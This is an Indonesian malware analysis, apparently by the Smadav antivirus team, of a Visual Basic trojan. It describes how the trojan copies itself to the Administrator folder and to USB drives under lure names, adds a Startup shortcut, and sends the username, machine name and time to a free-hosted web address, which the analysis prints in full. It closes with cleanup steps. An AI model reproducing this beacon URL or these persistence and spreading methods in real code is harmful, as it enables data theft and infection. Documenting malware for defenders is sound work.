Dengan modal nekat, trojan yang satu ini memanfaatkan layanan webhosting gratis untuk melancarkan aksinya, entah untuk mencuri data apa dia (virus trojan) dengan mengirimkan sejumlah sedikit paket data ke alamat situs (yang sekarang sudah tidak bisa digunakan) dengan formatan username & machine name & datetime:
http://www.oriontronproject.site11.com/post.php?files=&user=Administrator&machine=SMADAV-BA9B1F20&datetime=02-15-2014*17:55:02
Karakteristik Virus
Dibuat menggunakan: Microsoft Visual Basic v5.0/v6.0
Ukuran file: 140 KB (143,360 bytes)
Aksi Virus
Tidak banyak aksinya, karena memang tujuan dibuatnya sepertinya hanya untuk menjadi trojan, bukan virus yang suka menggandakan diri dengan banyak pada data storage seperti flashdisk misalnya dengan penggandaan sebanyak file atau folder yang ada, bukan.
Saat virus ini aktif pada komputer, maka akan meng-copy-kan dirinya ke direktori Administrator dengan nama file yang acak.
Tak lupa meng-copy-kan pada flashdisk yang ada dengan nama file “Hot fotos.exe” dan “My Musik(2013).exe”.
Virus ini juga membuat sebuah file shortcut pada Startup, yang nantinya akan memanggil file virus yang ada pada direktori Administrator tadi.
Sedikit kesalahan dalam proses pengiriman data, seharusnya dia menyembunyikan proses tersebut dari munculnya browser pada layar Desktop, hal ini tentu menjadi hal yang riskan jika ingin menjalankan aksi, khususnya jika user sadar kalau dia (user) tidak pernah mengakses ke alamat situs yang demikian.
Cara Membersikahkan
Smadav dapat dengan mudah membersihkan virus ini dari komputer, cukup lakukan scanning, dan fix saat selesai dari proses scanning.
Sebelum.
Sesudah.
Link terkait:
http://www.threatexpert.com/report.aspx?md5=9b48fba9b6d2a24049a1a4f883f24a64